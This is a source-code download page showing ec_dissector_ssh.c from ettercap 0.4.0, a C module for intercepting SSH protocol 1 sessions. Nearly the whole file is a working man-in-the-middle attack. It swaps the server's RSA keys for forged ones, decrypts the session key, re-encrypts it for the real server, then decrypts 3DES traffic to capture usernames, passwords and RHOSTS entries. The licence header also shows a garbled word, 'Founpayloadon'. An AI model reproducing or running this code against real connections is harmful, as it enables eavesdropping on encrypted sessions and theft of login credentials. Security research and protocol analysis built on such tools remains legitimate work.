开通博客赚积分
发布资源赚积分
分类

源码开发语言/平台
当前位置:首页 > 源码/资料 > Internet/网络编程 > 网络截获/分析 > 查看源码
ec_dissector_ssh.c
资源名称:ettercap-0.4.0.tar.gz [点击查看]
上传用户:nilegod
上传日期:2007-01-08
资源大小:220k
文件大小:20k
源码类别:

网络截获/分析

开发平台:

C/C++

ec_dissector_ssh.c:源码内容
  1. /*    ettercap -- dissector SSH
  3.     Copyright (C) 2001  ALoR <alor@users.sourceforge.net>, NaGA <crwm@freemail.it>
  5.     This program is free software; you can redistribute it and/or modify
  6.     it under the terms of the GNU General Public License as published by
  7.     the Free Software Founpayloadon; either version 2 of the License, or
  8.     (at your option) any later version.
  10.     This program is distributed in the hope that it will be useful,
  11.     but WITHOUT ANY WARRANTY; without even the implied warranty of
  12.     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  13.     GNU General Public License for more details.
  15.     You should have received a copy of the GNU General Public License
  16.     along with this program; if not, write to the Free Software
  17.     Founpayloadon, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
  18. */
  20. #include "include/ec_main.h"
  22. #ifdef HAVE_OPENSSL  // don't compile if you don't have OpenSSL
  24. #include <string.h>
  25. #include <stdio.h>
  26. #include <stdlib.h>
  27. #include <errno.h>
  28. #include <arpa/nameser.h>
  29. #include <openssl/ssl.h>
  30. #include <openssl/rand.h>
  31. #include <ctype.h>
  33. #include "include/ec_dissector.h"
  34. #include "include/ec_inet_forge.h"
  35. #include "include/ec_inet_structures.h"
  36. #include "include/ec_error.h"
  37. #include "include/ec_decodedata.h"
  39. #ifdef DEBUG
  40.    #include "include/ec_debug.h"
  41. #endif
  44. #define STREAM_DATA 3000
  47. struct peer {
  48.     u_short source_port;
  49.     u_int   source_ip;
  50.     u_short dest_port;
  51.     u_int   dest_ip;
  52. };
  54. typedef struct {
  55.     RSA *myserverkey;
  56.     RSA *myhostkey;
  57.     int server_mod;
  58.     int host_mod;
  59.     struct ssh_my_key *next;
  60. } ssh_my_key;
  62. typedef struct {
  63.     struct peer match;
  64.     RSA *serverkey;
  65.     RSA *hostkey;
  66.     ssh_my_key *ptrkey;
  67.     void *state_source;
  68.     void *state_dest;
  69.     long int s_seq;
  70.     long int d_seq;
  71.     char d_stream[STREAM_DATA];
  72.     char s_stream[STREAM_DATA];
  73.     struct ssh_state *next;
  74. } ssh_state;
  76. struct des3_state
  77. {
  78.    des_key_schedule        k1, k2, k3;
  79.    des_cblock              iv1, iv2, iv3;
  80. };
  83. ssh_state *ssh_conn=NULL;
  84. ssh_my_key *ssh_conn_key=NULL;
  86. // protos
  88. FUNC_DISSECTOR(Dissector_ssh);
  89. static void put_bn(BIGNUM *bn, u_char **pp);
  90. static void get_bn(BIGNUM *bn, u_char **pp);
  91. static u_char *ssh_session_id(u_char *cookie, BIGNUM *hostkey_n, BIGNUM *serverkey_n);
  92. int Encrypt_state(u_char *pad, int len);
  93. void rsa_public_encrypt(BIGNUM *out, BIGNUM *in, RSA *key);
  94. void rsa_private_decrypt(BIGNUM *out, BIGNUM *in, RSA *key);
  95. void des3_decrypt(u_char *src, u_char *dst, int len, void *state);
  96. void *des3_init(u_char *sesskey, int len);
  98. // --------------------
  99. void *des3_init(u_char *sesskey, int len)
  100. {
  101.    struct des3_state *state;
  103.    state = malloc(sizeof(*state));
  105.    des_set_key((void *)sesskey, state->k1);
  106.    des_set_key((void *)(sesskey + 8), state->k2);
  108.    if (len <= 16)
  109.       des_set_key((void *)sesskey, state->k3);
  110.    else
  111.       des_set_key((void *)(sesskey + 16), state->k3);
  113.    memset(state->iv1, 0, 8);
  114.    memset(state->iv2, 0, 8);
  115.    memset(state->iv3, 0, 8);
  117.    return (state);
  118. }
  120. void des3_decrypt(u_char *src, u_char *dst, int len, void *state)
  121. {
  122.    struct des3_state *dstate;
  124.    dstate = (struct des3_state *)state;
  125.    memcpy(dstate->iv1, dstate->iv2, 8);
  127.    des_ncbc_encrypt(src, dst, len, dstate->k3, &dstate->iv3, DES_DECRYPT);
  128.    des_ncbc_encrypt(dst, dst, len, dstate->k2, &dstate->iv2, DES_ENCRYPT);
  129.    des_ncbc_encrypt(dst, dst, len, dstate->k1, &dstate->iv1, DES_DECRYPT);
  130. }
  132. int Encrypt_state(u_char *pad, int len)
  133. {
  134.     int i;
  136.     for (i=0; i<len; i++)
  137.       if (pad[i]!=0) return 1;
  139.     return 0;
  140. }
  142. static void put_bn(BIGNUM *bn, u_char **pp)
  143. {
  144.    short i;
  146.    i = BN_num_bits(bn);
  147.    PUTSHORT(i, *pp);
  148.    *pp+=BN_bn2bin(bn, *pp);
  149. }
  151. static void get_bn(BIGNUM *bn, u_char **pp)
  152. {
  153.    short i;
  155.    GETSHORT(i, *pp);
  156.    i = ((i + 7) / 8);
  157.    BN_bin2bn(*pp, i, bn);
  158.    *pp += i;
  159. }
  161. static u_char *ssh_session_id(u_char *cookie, BIGNUM *hostkey_n, BIGNUM *serverkey_n)
  162. {
  163.    static u_char sessid[16];
  164.    u_int i, j;
  165.    u_char *p;
  167.    i = BN_num_bytes(hostkey_n);
  168.    j = BN_num_bytes(serverkey_n);
  170.    if ((p = malloc(i + j + 8)) == NULL)
  171.       return (NULL);
  173.    BN_bn2bin(hostkey_n, p);
  174.    BN_bn2bin(serverkey_n, p + i);
  175.    memcpy(p + i + j, cookie, 8);
  177.    MD5(p, i + j + 8, sessid);
  178.    free(p);
  180.    return (sessid);
  181. }
  183. void rsa_public_encrypt(BIGNUM *out, BIGNUM *in, RSA *key)
  184. {
  185.    u_char *inbuf, *outbuf;
  186.    int len, ilen, olen;
  188.    olen = BN_num_bytes(key->n);
  189.    outbuf = malloc(olen);
  191.    ilen = BN_num_bytes(in);
  192.    inbuf = malloc(ilen);
  194.    BN_bn2bin(in, inbuf);
  196.    len = RSA_public_encrypt(ilen, inbuf, outbuf, key, RSA_PKCS1_PADDING);
  198.    BN_bin2bn(outbuf, len, out);
  200.    free(outbuf);
  201.    free(inbuf);
  202. }
  204. void rsa_private_decrypt(BIGNUM *out, BIGNUM *in, RSA *key)
  205. {
  206.    u_char *inbuf, *outbuf;
  207.    int len, ilen, olen;
  209.    olen = BN_num_bytes(key->n);
  210.    outbuf = malloc(olen);
  212.    ilen = BN_num_bytes(in);
  213.    inbuf = malloc(ilen);
  215.    BN_bn2bin(in, inbuf);
  217.    len = RSA_private_decrypt(ilen, inbuf, outbuf, key, RSA_PKCS1_PADDING);
  219.    BN_bin2bn(outbuf, len, out);
  221.    free(outbuf);
  222.    free(inbuf);
  223. }
  225. void reconstruct_stream(u_char *ibuf, short bufflen, u_char *obuf)
  226. {
  227.    u_short *fromhere;
  228.    short *datalen;
  230.    fromhere = (u_short *)(obuf);
  231.    memcpy(obuf + 4 + *fromhere, ibuf, bufflen);
  232.    *fromhere = 0;
  233.    datalen = (u_short *)(obuf + 2);
  234.    *datalen += bufflen;
  236. //#ifdef DEBUG
  237. // Debug_msg("ttt STREAM PUT %d %d -- %d", *fromhere, bufflen, *datalen);
  238. ////  Debug_msg("nn%snn", Decodedata_GetHexData(obuf+4, *datalen, 80));
  239. //#endif
  241. }
  243. int getfrom_stream(u_char *ibuf, u_char *obuf)
  244. {
  245.    u_short *fromhere;
  246.    short *datalen;
  247.    short ssh_len = 0;
  248.    short ssh_mod = 0;
  250.    fromhere = (u_short *)(ibuf);
  251.    datalen = (u_short *)(ibuf+2);
  253.    ssh_len = ntohl(ptohl(ibuf + 4 + *fromhere));
  254.    ssh_mod = 8 - (ssh_len % 8);
  256. //#ifdef DEBUG
  257. // Debug_msg("ttt GETFROM STREAM datalen %d -- form %d -- ssh %d", *datalen, *fromhere, ssh_len+ssh_mod+4);
  258. ////   Debug_msg("nn%snn", Decodedata_GetHexData(ibuf + 4 + *fromhere, len, 80));
  259. //#endif
  261.    *datalen -= (ssh_len+ssh_mod+4);
  263.    if (*datalen < 0)
  264.    {
  265. //#ifdef DEBUG
  266. // Debug_msg("ttt STREAM MOVE from %d  datalen %d  ssh %d -- newfrom %d", *fromhere, *datalen, ssh_len+ssh_mod+4, *datalen + ssh_len+ssh_mod+4);
  267. //#endif
  268.       memmove(ibuf + 4 , ibuf + 4 + *fromhere, *datalen + ssh_len+ssh_mod+4); // move the rest
  269.       *fromhere = *datalen + ssh_len+ssh_mod+4;
  270.       *datalen += ssh_len+ssh_mod+4;
  271. //#ifdef DEBUG
  272. // Debug_msg("ttt STREAM AFTER MOVE -- from %d  datalen %d ", *fromhere, *datalen);
  273. //#endif
  274.       return 0;
  275.    }
  276.    else
  277.    {
  278. //#ifdef DEBUG
  279. // Debug_msg("ttt STREAM GET from %d  datalen %d  ssh %d", *fromhere, *datalen, ssh_len+ssh_mod+4);
  280. //#endif
  281.       memcpy(obuf, ibuf + 4 + *fromhere, ssh_len+ssh_mod+4);
  282.       if (*datalen == 0)
  283.          *fromhere = 0;
  284.       else
  285.          *fromhere += ssh_len+ssh_mod+4;
  286.       return ssh_len+ssh_mod+4;
  287.    }
  289.    return 0;
  291. }
  293. FUNC_DISSECTOR(Dissector_ssh)
  294. {
  296.    TCP_header *tcp;
  297.    u_char *payload;
  298.    u_long ssh_len, ssh_mod, datalen, to_arrive;
  299.    u_int IPS, IPD;
  300.    u_short PORTS, PORTD;
  301.    static int initialized=0;
  302.    int direction=0;
  303. DATA_DISSECTOR;
  305.    if (!initialized) { SSL_library_init(); initialized=1; }
  307.    tcp = (TCP_header *) data;
  309.    if (Conn_Mode)
  310.    {
  311.        datalen = data_to_ettercap->datalen;
  312.        IPS = inet_addr(data_to_ettercap->ip_source);
  313.        IPD = inet_addr(data_to_ettercap->ip_dest);
  314.        PORTS = data_to_ettercap->source_port;
  315.        PORTD = data_to_ettercap->dest_port;
  316.    }
  317.    else
  318.    {
  319.        IPS = inet_addr(sniff_data_to_ettercap->ip_source);
  320.        IPD = inet_addr(sniff_data_to_ettercap->ip_dest);
  321.        PORTS = sniff_data_to_ettercap->source_port;
  322.        PORTD = sniff_data_to_ettercap->dest_port;
  323.        datalen = sniff_data_to_ettercap->datasize;
  324.    }
  326.    if (datalen==0) return 0;     // skip ack packets
  328.    payload = (u_char *)((u_long)tcp + tcp->doff * 4);
  329.    to_arrive = (u_long)payload+datalen;
  331.    ssh_len = ptohl(payload);
  332.    ssh_len = ntohl(ssh_len);
  333.    ssh_mod = 8 - (ssh_len % 8);
  335. #ifdef DEBUG
  336.    Debug_msg("t PAYLOAD DATALEN %d -- %d",  datalen, ssh_len+ssh_mod+4);
  337.    if (ssh_len > STREAM_DATA) Debug_msg("ttttttt to be reconstructed");
  338. // Debug_msg("nn%snn", Decodedata_GetHexData(payload, datalen, 80));
  339. #endif
  342.    // Find interesting packets
  343.    //if (ssh_len + 4 + ssh_mod <= datalen)
  344.    {
  345.       u_char ssh_packet_type, *p;
  346.       ssh_packet_type = *(payload+4+ssh_mod);
  347.       // Skip to binary data
  348.       p = payload+4+ssh_mod+1;
  350.       if ( Encrypt_state(payload+4, ssh_mod) )  // Crypted packets
  351.       {
  352.           ssh_state **index;
  353.           struct peer pckpeer;
  355.           // Setting peer
  356.           memset(&pckpeer,0,sizeof(pckpeer));
  357.           pckpeer.source_port= PORTS;
  358.           pckpeer.source_ip  = IPS;
  359.           pckpeer.dest_port  = PORTD;
  360.           pckpeer.dest_ip    = IPD;
  362.           // Find correct session
  363.           index = &ssh_conn;
  364.           while(*index != NULL && memcmp(&((*index)->match),&pckpeer,sizeof(pckpeer)))
  365.           index = (ssh_state **)&((*index)->next);
  367.           if ( (*index) != NULL )
  368.              direction=1;
  369.           else
  370.           {
  371.             // Setting peer
  372.             memset(&pckpeer,0,sizeof(pckpeer));
  373.             pckpeer.source_port= PORTD;
  374.             pckpeer.source_ip  = IPD;
  375.             pckpeer.dest_port  = PORTS;
  376.             pckpeer.dest_ip    = IPS;
  378.             // Find correct session
  379.             index = &ssh_conn;
  380.             while(*index != NULL && memcmp(&((*index)->match),&pckpeer,sizeof(pckpeer)))
  381.                 index = (ssh_state **)&((*index)->next);
  383.             if ( (*index) != NULL )
  384.                direction=2;
  385.           }
  387.           if (!direction) return 0; // Skip Crypted messages whith no session
  389.           // Continue for no 0padding in session key for damnPutty
  390.           if((*index)->state_source && (*index)->state_dest)
  391.           {
  392.             char pacchetto[MAX_DATA];
  393.             char packet[MAX_DATA];
  394.             u_char *stream;
  395.             short slen=0;
  397.             ssh_packet_type = 0;
  399.             if (!Conn_Mode)
  400.             {
  401.                sniff_data_to_ettercap->datasize=0;
  402.                memset(sniff_data_to_ettercap->data, 0, MAX_DATA);
  403.             }
  405.             if (datalen>MAX_DATA) return 0; // Is it possible?
  407.             // Simple workaround for duplicated packets
  408.             if (direction==1)
  409.             {
  410.                if( (*index)->s_seq && (*index)->s_seq == tcp->seq ) return 0;
  411.                (*index)->s_seq = tcp->seq;
  412.                reconstruct_stream(payload, datalen, (*index)->s_stream);
  413.                stream = (*index)->s_stream;
  414.             }
  415.             else
  416.             {
  417.                if( (*index)->d_seq && (*index)->d_seq == tcp->seq ) return 0;
  418.                (*index)->d_seq = tcp->seq;
  419.                reconstruct_stream(payload, datalen, (*index)->d_stream);
  420.                stream = (*index)->d_stream;
  421.             }
  423.             while ( (slen = getfrom_stream(stream, packet) ) > 0)
  424.             {
  426.                ssh_len = ptohl(packet);
  427.                ssh_len = ntohl(ssh_len);
  428.                ssh_mod = 8 - (ssh_len % 8);
  430. #ifdef DEBUG
  431.    Debug_msg("t STREAM DATALEN %d -- %d",  slen, ssh_len+ssh_mod+4);
  432.    //Debug_msg("nn%snn", Decodedata_GetHexData(packet, slen, 80));
  433. #endif
  434.                memset(pacchetto, 0, MAX_DATA);
  436.                // Simple workaround for duplicated packets
  437.                if (direction==1)
  438.                   des3_decrypt(packet+4, (u_char *)pacchetto, ssh_len+ssh_mod, (*index)->state_source);
  439.                else
  440.                   des3_decrypt(packet+4, (u_char *)pacchetto, ssh_len+ssh_mod, (*index)->state_dest);
  442. //#ifdef DEBUG
  443. // Debug_msg("t STREAM DECRYPTED %d -- %d",  slen, ssh_len+ssh_mod+4);
  444. // //Debug_msg("nn%snn", Decodedata_GetHexData(packet, slen, 80));
  445. //#endif
  447.                if (Conn_Mode)
  448.                {
  449.                   int len;
  450.                   len = ptohl(pacchetto+ssh_mod+1);
  451.                   len = htonl(len);
  453. //#ifdef DEBUG
  454. // Debug_msg("t conn_mode len = %d  ", len);
  455. //#endif
  457.                   if (pacchetto[ssh_mod]==4) // SSH_CMSG_USER
  458.                   {
  459.                      memcpy(data_to_ettercap->user,&pacchetto[ssh_mod+5],len);
  460.                      strcat(data_to_ettercap->user,"n");
  461.                   }
  463.                   if (pacchetto[ssh_mod]==9) // SSH_AUTH_PASSWORD
  464.                   {
  465.                      memcpy(data_to_ettercap->pass,&pacchetto[ssh_mod+5],len);
  466.                      strcat(data_to_ettercap->pass,"n");
  467.                   }
  469.                   if (pacchetto[ssh_mod]==5)
  470.                   {
  471.                      strcpy(data_to_ettercap->pass,"RHOSTS:");
  472.                      strncat(data_to_ettercap->pass,&pacchetto[ssh_mod+5],len);
  473.                      strcat(data_to_ettercap->pass,"n");
  474.                   }
  476.                   if (pacchetto[ssh_mod]==6)
  477.                      strcpy(data_to_ettercap->pass,"RSA AUTHn");
  478.                }
  479.                else
  480.                {
  481.                   if ((pacchetto[ssh_mod]>=16 && pacchetto[ssh_mod]<=18) ||
  482.                        pacchetto[ssh_mod] == 4 || pacchetto[ssh_mod] == 9)
  483.                   {   // print readable packets
  485.                      int len;
  486.                      len = ptohl(pacchetto+ssh_mod+1);
  487.                      len = htonl(len);
  489.                      sniff_data_to_ettercap->datasize+=len;
  490.                      if (sniff_data_to_ettercap->datasize < MAX_DATA)
  491.                         strncat(sniff_data_to_ettercap->data,&pacchetto[ssh_mod+5],len);
  493. #ifdef DEBUG
  494.    Debug_msg("t len = %d  -- ettercap len %d", len, sniff_data_to_ettercap->datasize);
  495.    //Debug_msg("nn%snn",Decodedata_GetAsciiData(sniff_data_to_ettercap->data, sniff_data_to_ettercap->datasize));
  496. #endif
  497.                   }
  498.                }
  501.             }  // end while
  503.             return 0;
  504.           }
  505.       }
  506.       else  // Plain text packets
  507.       if (ssh_packet_type==2 && Conn_Mode) //PUBLIC_KEY
  508.       {
  509.           ssh_state **index;
  510.           ssh_my_key **index2;
  512.           struct peer pckpeer;
  513.           int server_mod, host_mod;
  514.           u_char *q;
  515.           // Setting peer
  516.           memset(&pckpeer,0,sizeof(pckpeer));
  517.           pckpeer.source_port= PORTS;
  518.           pckpeer.source_ip  = IPS;
  519.           pckpeer.dest_port  = PORTD;
  520.           pckpeer.dest_ip    = IPD;
  522.           // Find correct session
  523.              index = &ssh_conn;
  524.              index2 = &ssh_conn_key;
  526.           while(*index != NULL && memcmp(&((*index)->match),&pckpeer,sizeof(pckpeer)))
  527.             index = (ssh_state **)&((*index)->next);
  529.           p+=8; q=p;
  530.           if (*index == NULL)
  531.           {
  532.             *index = (ssh_state *)calloc(1, sizeof(ssh_state));
  533.             memcpy(&((*index)->match), &pckpeer, sizeof(pckpeer));
  535.             (*index)->state_source=NULL;
  536.             (*index)->state_dest=NULL;
  538.             (*index)->serverkey = RSA_new();
  539.             (*index)->serverkey->n = BN_new();
  540.             (*index)->serverkey->e = BN_new();
  542.             (*index)->hostkey = RSA_new();
  543.             (*index)->hostkey->n = BN_new();
  544.             (*index)->hostkey->e = BN_new();
  545.             (*index)->s_seq=0;
  546.             (*index)->d_seq=0;
  547.             (*index)->next = NULL;
  549.             //  Get the RSA Key
  550.             GETLONG(server_mod,p);
  551.             get_bn((*index)->serverkey->e, &p);
  552.             get_bn((*index)->serverkey->n, &p);
  554.             GETLONG(host_mod,p);
  555.             get_bn((*index)->hostkey->e, &p);
  556.             get_bn((*index)->hostkey->n, &p);
  559.             while(*index2 != NULL && ( (*index2)->server_mod!=server_mod || (*index2)->host_mod!=host_mod))
  560.                 index2 = (ssh_my_key **)&((*index2)->next);
  562.             if (*index2==NULL)
  563.             {
  564.                *index2 = (ssh_my_key *)calloc(1,sizeof(ssh_my_key));
  566.                // Generate the new key
  567.                (*index2)->myserverkey=(RSA *)RSA_generate_key(server_mod, 35, NULL, NULL);
  568.                (*index2)->myhostkey=(RSA *)RSA_generate_key(host_mod, 35, NULL, NULL);
  569.                (*index2)->server_mod=server_mod;
  570.                (*index2)->host_mod=host_mod;
  571.                (*index2)->next = NULL;
  573.             }
  575.             (*index)->ptrkey=*index2;
  576.           }
  578.           *index2=(*index)->ptrkey;
  580.           // Put the new key
  581.           q+=4;
  582.           put_bn((*index2)->myserverkey->e, &q);
  583.           put_bn((*index2)->myserverkey->n, &q);
  584.           q+=4;
  585.           put_bn((*index2)->myhostkey->e, &q);
  586.           put_bn((*index2)->myhostkey->n, &q);
  588.           // Set the mask to 3DES
  589.           ptohl(payload+datalen-12) = htonl(8);
  590.           // recalculate SSH crc
  591.           ptohl(payload+datalen-4) = htonl(Inet_Forge_CRC(payload+4, datalen-8));
  592.           // recalculate TCP checksum
  593.           tcp->checksum = 0;
  594.           tcp->checksum = Inet_Forge_Checksum((unsigned short *)tcp, IPPROTO_TCP, datalen+(tcp->doff * 4), IPS, IPD);
  595.       }
  596.       //else
  597.       if (ssh_packet_type==3 && Conn_Mode) // SESSION_KEY
  598.       {
  599.           u_char cookie[8];
  600.           u_char sesskey[32];
  601.           u_char *temp_session_id, *q;
  602.           u_char session_id1[16], session_id2[16];
  603.           BIGNUM *enckey,*bn;
  604.           int i;
  606.           ssh_state **index;
  607.           ssh_my_key *index2;
  608.           struct peer pckpeer;
  610.           memset(&pckpeer,0,sizeof(pckpeer));
  611.           pckpeer.source_port= PORTD;
  612.           pckpeer.source_ip  = IPD;
  613.           pckpeer.dest_port  = PORTS;
  614.           pckpeer.dest_ip    = IPS;
  616.           // Find correct session
  617.           index = &ssh_conn;
  618.           while(*index != NULL && memcmp(&((*index)->match),&pckpeer,sizeof(pckpeer)))
  619.             index = (ssh_state **)&((*index)->next);
  621.           if (*index==NULL) return 0;
  622.           if (!(*index)->serverkey || !(*index)->hostkey)
  623.             return 0;
  624.           index2=(*index)->ptrkey;
  626.           p++; // Cypher type;
  627.           // Get the cookie
  628.           memcpy(cookie, p, 8);
  629.           p+=8; q=p;
  631.           // Calculate real session id and fake session id
  632.           temp_session_id=ssh_session_id(cookie, (*index)->hostkey->n,(*index)->serverkey->n);
  633.           memcpy(session_id1, temp_session_id, 16);
  634.           temp_session_id=ssh_session_id(cookie, (index2)->myhostkey->n,(index2)->myserverkey->n);
  635.           memcpy(session_id2, temp_session_id, 16);
  637.           // Get the session key
  638.           enckey = BN_new();
  639.           get_bn(enckey, &p);
  641.           // Decrypt session key
  642.           if (BN_cmp((index2)->myserverkey->n, (index2)->myhostkey->n) > 0)
  643.           {
  644.             rsa_private_decrypt(enckey, enckey, (index2)->myserverkey);
  645.             rsa_private_decrypt(enckey, enckey, (index2)->myhostkey);
  646.           }
  647.           else
  648.           {
  649.             rsa_private_decrypt(enckey, enckey, (index2)->myhostkey);
  650.             rsa_private_decrypt(enckey, enckey, (index2)->myserverkey);
  651.           }
  653.           BN_mask_bits(enckey, sizeof(sesskey) * 8);
  654.           i = BN_num_bytes(enckey);
  655.           memset(sesskey, 0, sizeof(sesskey));
  656.           BN_bn2bin(enckey, sesskey + sizeof(sesskey) - i);
  657.           BN_clear_free(enckey);
  659.           for (i = 0; i < 16; i++)
  660.             sesskey[i] ^= session_id2[i];
  662.           // SAVE SESSION_KEY
  663.           (*index)->state_source=des3_init(sesskey, sizeof(sesskey));
  664.           (*index)->state_dest  =des3_init(sesskey, sizeof(sesskey));
  666.           // ReCrypt Session Key
  667.           bn = BN_new();
  668.           BN_set_word(bn, 0);
  670.           for (i = 0; i < sizeof(sesskey); i++)
  671.           {
  672.             BN_lshift(bn, bn, 8);
  673.             if (i < 16) BN_add_word(bn, sesskey[i] ^ session_id1[i]);
  674.             else BN_add_word(bn, sesskey[i]);
  675.           }
  677.           if (BN_cmp((*index)->serverkey->n, (*index)->hostkey->n) < 0)
  678.           {
  679.             rsa_public_encrypt(bn, bn, (*index)->serverkey);
  680.             rsa_public_encrypt(bn, bn, (*index)->hostkey);
  681.           }
  682.           else
  683.           {
  684.             rsa_public_encrypt(bn, bn, (*index)->hostkey);
  685.             rsa_public_encrypt(bn, bn, (*index)->serverkey);
  686.           }
  688.              // Clear the session
  689.           RSA_free((*index)->serverkey);
  690.           RSA_free((*index)->hostkey);
  691.           (*index)->serverkey=NULL;
  692.           (*index)->hostkey=NULL;          // Put right Session Key in the packet
  693.           put_bn(bn, &q);
  694.           BN_clear_free(bn);
  696.           // recalculate SSH crc
  697.           ptohl(payload+datalen-4) = htonl(Inet_Forge_CRC(payload+4, datalen-8));
  698.           // recalculate TCP checksum
  699.           tcp->checksum = 0;
  700.           tcp->checksum = Inet_Forge_Checksum((unsigned short *)tcp, IPPROTO_TCP, datalen+(tcp->doff * 4), IPS, IPD);
  701.           strcpy(data_to_ettercap->type,"SSH decrypt");
  702.       }
  704.    }
  706.    return 0;
  707. }
  709. #endif   // HAVE_OPENSSL
  711. /* EOF */